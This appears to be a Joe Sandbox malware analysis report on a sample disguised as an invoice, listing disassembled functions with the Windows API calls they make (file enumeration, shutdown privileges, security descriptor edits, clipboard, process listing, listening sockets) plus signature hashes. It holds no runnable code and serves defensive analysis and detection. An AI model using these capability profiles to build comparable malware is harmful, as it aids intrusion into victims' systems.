                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                              • API String ID: 3393021363-188983378
                              • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                              • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                              • FindClose.KERNEL32(00000000), ref: 00431B20
                              • FindClose.KERNEL32(00000000), ref: 00431B34
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1409584000-438819550
                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                              • __swprintf.LIBCMT ref: 00431C2E
                              • _wcslen.LIBCMT ref: 00431C3A
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                              • String ID: :$\$\??\%s
                              • API String ID: 2192556992-3457252023
                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                              • __swprintf.LIBCMT ref: 004722B9
                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FolderPath$LocalTime__swprintf
                              • String ID: %.3d
                              • API String ID: 3337348382-986655627
                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                              • FindClose.KERNEL32(00000000), ref: 0044291C
                              • FindClose.KERNEL32(00000000), ref: 00442930
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                              • FindClose.KERNEL32(00000000), ref: 004429E2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 2640511053-438819550
                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                              • GetLastError.KERNEL32 ref: 00433414
                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2938487562-3733053543
                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                              APIs
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                              • CopySid.ADVAPI32(00000000), ref: 00446271
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                              • String ID:
                              • API String ID: 1255039815-0
                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                              APIs
                              • __swprintf.LIBCMT ref: 00433073
                              • __swprintf.LIBCMT ref: 00433085
                              • __wcsicoll.LIBCMT ref: 00433092
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                              • LockResource.KERNEL32(00000000), ref: 004330CA
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                              • LockResource.KERNEL32(?), ref: 00433120
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                              • String ID:
                              • API String ID: 1158019794-0
                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                              • GetLastError.KERNEL32 ref: 0045D6BF
                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove$_strncmp
                              • String ID: @oH$\$^$h
                              • API String ID: 2175499884-3701065813
                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocket$bindlistensocket
                              • String ID:
                              • API String ID: 540024437-0
                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                              • API String ID: 0-2872873767
                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                              • __wsplitpath.LIBCMT ref: 00475644
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscat.LIBCMT ref: 00475657
                              • __wcsicoll.LIBCMT ref: 0047567B
                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                              • String ID:
                              • API String ID: 2547909840-0
                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                              • FindClose.KERNEL32(?), ref: 004525FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
